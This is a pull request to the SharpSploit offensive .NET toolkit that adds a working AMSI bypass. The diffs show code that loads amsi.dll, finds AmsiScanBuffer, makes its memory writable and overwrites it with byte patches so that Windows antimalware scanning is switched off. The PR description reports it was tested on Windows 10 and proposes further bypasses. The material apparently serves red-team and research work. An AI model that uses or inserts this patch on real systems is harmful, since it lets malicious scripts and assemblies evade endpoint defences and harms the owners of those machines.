### PR TITLE
Add AmsiScanBuffer bypass

### DIFF
--- a/SharpSploit/Evasion/Amsi.cs
+++ b/SharpSploit/Evasion/Amsi.cs
@@ -5,9 +5,10 @@
 using System;
 using System.Runtime.InteropServices;
 
+using SharpSploit.Misc;
 using SharpSploit.Execution;
 
-namespace SharpSploit.Misc
+namespace SharpSploit.Evasion
 {
     /// <summary>
     /// Amsi is a class for manipulating the Antimalware Scan Interface.

--- a/SharpSploit/Evasion/Amsi.cs
+++ b/SharpSploit/Evasion/Amsi.cs
@@ -44,6 +44,7 @@ namespace SharpSploit.Evasion
             catch (Exception e)
             {
                 Console.Error.WriteLine("Exception: " + e.Message);
+
                 return false;
             }
         }

--- a/SharpSploit/Misc/Amsi.cs
+++ b/SharpSploit/Misc/Amsi.cs
@@ -9,9 +9,20 @@ using SharpSploit.Execution;
 
 namespace SharpSploit.Misc
 {
+    /// <summary>
+    /// Amsi is a class for manipulating the Antimalware Scan Interface.
+    /// </summary>
     public class Amsi
     {
-        public static bool BypassAmsi()
+        /// <summary>
+        /// Patch the AmsiScanBuffer function in amsi.dll.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>Bool. True if succeeded, otherwise false.</returns>
+        /// <remarks>
+        /// Credit to Adam Chester (@_xpn_).
+        /// </remarks>
+        public static bool PatchAmsiScanBuffer()
         {
             byte[] patch;
 
@@ -31,10 +42,9 @@ namespace SharpSploit.Misc
             }
             catch (Exception e)
             {
-                Console.Error.WriteLine("Exception: " + e.Message + Environment.NewLine + e.InnerException);
+                Console.Error.WriteLine("Exception: " + e.Message);
                 return false;
             }
-            
         }
     }
 }

--- a/SharpSploit/Misc/Amsi.cs
+++ b/SharpSploit/Misc/Amsi.cs
@@ -1,0 +1,40 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.Runtime.InteropServices;
+
+using SharpSploit.Execution;
+
+namespace SharpSploit.Misc
+{
+    public class Amsi
+    {
+        public static bool BypassAmsi()
+        {
+            byte[] patch;
+
+            if (Utilities.is64Bit) { patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; } else { patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; }
+
+            try
+            {
+                var library = Win32.Kernel32.LoadLibrary("amsi.dll");
+                var address = Win32.Kernel32.GetProcAddress(library, "AmsiScanBuffer");
+
+                uint oldProtect;
+                Win32.Kernel32.VirtualProtect(address, (UIntPtr)patch.Length, 0x40, out oldProtect);
+
+                Marshal.Copy(patch, 0, address, patch.Length);
+
+                return true;
+            }
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("Exception: " + e.Message + Environment.NewLine + e.InnerException);
+                return false;
+            }
+            
+        }
+    }
+}

--- a/SharpSploit/Misc/Utilities.cs
+++ b/SharpSploit/Misc/Utilities.cs
@@ -2,6 +2,7 @@
 // Project: SharpSploit (https://github.com/cobbr/SharpSploit)
 // License: BSD 3-Clause
 
+using System;
 using System.IO;
 using System.IO.Compression;
 using System.Linq;
@@ -75,6 +76,11 @@ namespace SharpSploit.Misc
                     return outputStream.ToArray();
                 }
             }
+        }
+
+        public static bool is64Bit
+        {
+            get { return IntPtr.Size == 8; }
         }
     }
 }

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -985,6 +985,21 @@
             <param name="RegHive">RegistryHive value to convert to string.</param>
             <returns>Matching RegistryHive string, defaults to HKEY_CURRENT_USER if none match.</returns>
         </member>
+        <member name="T:SharpSploit.Evasion.Amsi">
+            <summary>
+            Amsi is a class for manipulating the Antimalware Scan Interface.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Evasion.Amsi.PatchAmsiScanBuffer">
+            <summary>
+            Patch the AmsiScanBuffer function in amsi.dll.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if succeeded, otherwise false.</returns>
+            <remarks>
+            Credit to Adam Chester (@_xpn_).
+            </remarks>
+        </member>
         <member name="T:SharpSploit.Execution.Assembly">
             <summary>
             Assembly is a library for loading .NET assemblies and executing methods contained within them.
@@ -1355,21 +1370,6 @@
             <param name="Username">Username to authenticate as to the remote system.</param>
             <param name="Password">Password to authenticate the user.</param>
             <returns>Bool. True if execution succeeds, false otherwise.</returns>
-        </member>
-        <member name="T:SharpSploit.Misc.Amsi">
-            <summary>
-            Amsi is a class for manipulating the Antimalware Scan Interface.
-            </summary>
-        </member>
-        <member name="M:SharpSploit.Misc.Amsi.PatchAmsiScanBuffer">
-            <summary>
-            Patch the AmsiScanBuffer function in amsi.dll.
-            </summary>
-            <author>Daniel Duggan (@_RastaMouse)</author>
-            <returns>Bool. True if succeeded, otherwise false.</returns>
-            <remarks>
-            Credit to Adam Chester (@_xpn_).
-            </remarks>
         </member>
         <member name="T:SharpSploit.Misc.CountdownEvent">
             <summary>

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1356,6 +1356,21 @@
             <param name="Password">Password to authenticate the user.</param>
             <returns>Bool. True if execution succeeds, false otherwise.</returns>
         </member>
+        <member name="T:SharpSploit.Misc.Amsi">
+            <summary>
+            Amsi is a class for manipulating the Antimalware Scan Interface.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Misc.Amsi.PatchAmsiScanBuffer">
+            <summary>
+            Patch the AmsiScanBuffer function in amsi.dll.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if succeeded, otherwise false.</returns>
+            <remarks>
+            Credit to Adam Chester (@_xpn_).
+            </remarks>
+        </member>
         <member name="T:SharpSploit.Misc.CountdownEvent">
             <summary>
             CountdownEvent is used for counting Asynchronous operations


### PR DESCRIPTION
Adds:
- `SharpSploit.Evasion` namespace
- `Amsi` class
- `PatchAmsiScanBuffer` function.

Bypasses AMSI by patching the `AmsiScanBuffer` function in `amsi.dll`.  There is also scope to add different methods of bypasses, such as patching `AmsiScan` in `clr.dll`.

Tested on WIndows 10 1903 (build 18362.295) and .NET Framework 4.8 (release 528040).